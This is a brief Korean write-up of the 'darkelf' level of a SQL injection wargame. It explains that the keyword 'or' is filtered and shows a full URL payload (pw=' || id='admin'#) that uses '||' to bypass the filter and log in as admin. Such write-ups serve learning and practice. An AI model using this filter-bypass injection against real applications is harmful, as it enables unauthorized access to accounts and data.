los - darkelf

 

 

id='guest'로 고정되지만, 클리어는 'admin'을 원하고 있다.

 

이전처럼 'or' 연산자를 써야하는데 필터링 부분에 'or' 연산자가 추가되었다.

 

따라서 'or' 인듯, 'or 아닌 'or' 같은 역활을 하는 무언가를 입력해야 한다. (즉, 필터링 우회)

 

http://localhost/darkelf_c6a5ed64c4f6a7a5595c24977376136b.php?pw=%27%20||%20id=%27admin%27%23